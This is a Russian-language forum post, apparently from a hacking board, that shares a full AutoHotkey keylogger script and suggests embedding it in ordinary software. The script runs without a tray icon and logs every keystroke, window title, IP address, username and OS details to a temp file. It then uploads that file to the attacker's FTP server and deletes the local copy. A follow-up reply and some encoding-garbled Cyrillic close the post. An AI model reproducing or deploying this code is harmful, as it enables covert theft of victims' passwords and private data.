ТРепещщи) И так откопал AHK скрипт кейлогера Те кто знаком с данной суетой, отпишитесь Вместе замутим что-нибудь Скрипт сам создаст у вас папку FTP с айпи компьютера и запишет туда всё и по времени Можно вшивать в любую простую софтину Можно дописать защиту от диспетчера задач, но это только увеличит громоздкость скрипта Другие вопросы пишите ниже, #NoTrayIcon Server = твойайпиFTP Port = 21 User = ТвойлогинFTP Pwd = твойпарольFTP Directory1 = /keylog TTMilliseconds := A_TickCount TTSeconds := A_TickCount // 1000 TTMinutes := A_TickCount // 60000 TTHours := A_TickCount // 3600000 TTDays := A_TickCount // 86400000 TTWeeks := A_TickCount // 604800000 Milliseconds := TTMilliseconds - (1000 * (TTMilliseconds // 1000)) Seconds := TTSeconds - (60 * (TTSeconds // 60)) Minutes := TTMinutes - (60 * (TTMinutes // 60)) Hours := TTHours - (24 * (TTHours // 24)) Days := TTDays - (7 * (TTDays // 7)) Weeks := TTWeeks - (52 * (TTWeeks // 52)) If Weeks >= 1 Wc = %Weeks% нед. If Days >= 1 Dc = %Days% РґРЅ. If Hours >= 1 Hc = %Hours% С‡. If Minutes >= 1 Mc = %Minutes% РјРёРЅ. If Seconds >= 1 Sc = %Seconds% сек. UpTime = %Wc% %Dc% %Hc% %Mc% %Sc% Loop { FormatTime, CurrentDateTime,, M-d-yyyy_HH-mm tt FileAppend, Ip адрес машины => %A_IPAddress1% `n, %TEMP%\%CurrentDateTime%.txt FileAppend, РўРёРї РћРЎ => %A_OSType% `n, %TEMP%\%CurrentDateTime%.txt FileAppend, Версия РћРЎ => %A_OSVersion% `n, %TEMP%\%CurrentDateTime%.txt FileAppend, Сетевое РёРјСЏ компьютера => %A_ComputerName% `n, %TEMP%\%CurrentDateTime%.txt FileAppend, РРјСЏ пользователя => %A_UserName% `n, %TEMP%\%CurrentDateTime%.txt FileAppend, Размер экрана => %A_ScreenWidth% РЅР° %A_ScreenHeight% `n, %TEMP%\%CurrentDateTime%.txt FileAppend, Время работы системы => %UpTime% `n, %TEMP%\%CurrentDateTime%.txt WinGetActiveTitle, OutputVar FileAppend, Текущий заголовок РѕРєРЅР° => %OutputVar% `n, %TEMP%\%CurrentDateTime%.txt Loop 100{ Input, SingleKey, B C L1 V WinGetActiveTitle, OutputVar2 if (OutputVar2 = OutputVar){ }else{ FileAppend, `nТекущий заголовок РѕРєРЅР° => %OutputVar2% `n, %TEMP%\%CurrentDateTime%.txt OutputVar := OutputVar2 } FileAppend, %SingleKey%, %TEMP%\%CurrentDateTime%.txt } LocalFile = %TEMP%\%CurrentDateTime%.txt IfNotExist, %LocalFile% { Exit, 1 } if (not INetStart()) { Exit, 1 } hConnection := INetConnect(Server, Port, User, Pwd, "ftp", 1) if (hConnection) { Error = 0 UploadFile(hConnection, Directory1, LocalFile) Sleep, 1 FileDelete, %TEMP%\%CurrentDateTime%.txt } else { INetStop() Exit, 1 } Sleep, 1 } UploadFile(hConnection, Directory, LocalFile) { if (ChangeDirectory(hConnection, Directory)) { SplitPath, LocalFile, RemoteFile if (FtpPutFile(hConnection, LocalFile, RemoteFile)) { Return, true } else { MsgBox, Cannot upload file into %Directory%. Return, false } } else { MsgBox, Could not create or change to remote directory %Directory%. Return, false } } ChangeDirectory(hConnection, Directory) { if (FtpSetCurrentDirectory(hConnection, Directory)) { Return, true } else { if (FtpCreateDirectory(hConnection, Directory)) { if (FtpSetCurrentDirectory(hConnection, Directory)) { Return, true } else { MsgBox, Cannot change to remote directory %Directory%. Return, false } } else { MsgBox, Cannot create remote directory %Directory%. Return, false } MsgBox, Cannot change to remote directory %Directory%. Return, false } } INetStart(Proxy="", ProxyBypass="", Agent="") { global inet_hModule := DllCall("LoadLibrary", "str", "wininet.dll") if(!inet_hModule) { inet_hModule = 0 return false } inet_hInternet := DllCall("wininet\InternetOpenA" , "str", (Agent != "" ? Agent : A_ScriptName) , "UInt", (Proxy != "" ? 3 : 1) , "str", Proxy , "str", ProxyBypass , "UInt", 0) If(!inet_hInternet) { INetCloseHandle(inet_hModule) return false } return true } INetStop() { global INetCloseHandle(inet_hInternet) DllCall("FreeLibrary", "UInt", inet_hModule) inet_hModule = inet_hInternet = 0 } INetCloseHandle(hInternet) { return DllCall("wininet\InternetCloseHandle", "UInt", hInternet) } INetConnect(Server, Port, Username="anonymous", Password="anonymous", Service="http", FtpPassive=0) { global inet_hInternet hConnection := DllCall("wininet\InternetConnectA" , "uint", inet_hInternet , "str", Server , "uint", Port , "str", Username , "str", Password , "uint", (Service = "ftp" ? 1 : (Service = "gopher" ? 2 : 3)) , "uint", (FtpPassive != 0 ? 0x08000000 : 0) , "uint", 0) return hConnection } FtpCreateDirectory(hConnection, Directory) { return DllCall("wininet\FtpCreateDirectoryA", "uint", hConnection, "str", Directory) } FtpSetCurrentDirectory(hConnection, Directory) { return DllCall("wininet\FtpSetCurrentDirectoryA", "uint", hConnection, "str", Directory) } FtpGetCurrentDirectory(hConnection, ByRef @Directory) { len := 261 VarSetCapacity(@Directory, len) result := DllCall("wininet\FtpGetCurrentDirectoryA", "uint", hConnection, "str", @Directory, "uint*", len) VarSetCapacity(@Directory, -1) return result } FtpPutFile(hConnection, LocalFile, RemoteFile="", TransferType="B") { return DllCall("wininet\FtpPutFileA" , "uint", hConnection , "str", LocalFile , "str", (RemoteFile != "" ? RemoteFile : LocalFile) , "uint", (TransferType == "A" ? 1 : 2) , "uint", 0) } FtpDeleteFile(hConnection, File) { return DllCall("wininet\FtpDeleteFileA", "uint", hConnection, "str", File) }
FormatTime, CurrentDateTime,, M-d-yyyy_HH-mm tt FileAppend, Ip адрес машины => %A_IPAddress1% `n, %TEMP%\%CurrentDateTime%.txt FileAppend, РўРёРї РћРЎ => %A_OSType% `n, %TEMP%\%CurrentDateTime%.txt FileAppend, Версия РћРЎ => %A_OSVersion% `n, %TEMP%\%CurrentDateTime%.txt FileAppend, Сетевое РёРјСЏ компьютера => %A_ComputerName% `n, %TEMP%\%CurrentDateTime%.txt FileAppend, РРјСЏ пользователя => %A_UserName% `n, %TEMP%\%CurrentDateTime%.txt FileAppend, Размер экрана => %A_ScreenWidth% РЅР° %A_ScreenHeight% `n, %TEMP%\%CurrentDateTime%.txt FileAppend, Время работы системы => %UpTime% `n, %TEMP%\%CurrentDateTime%.txt WinGetActiveTitle, OutputVar FileAppend, Текущий заголовок РѕРєРЅР° => %OutputVar% `n, %TEMP%\%CurrentDateTime%.txt Нажмите, чтобы раскрыть...а вот тут с кодировкой нахуеверчено, че там написано хотьь???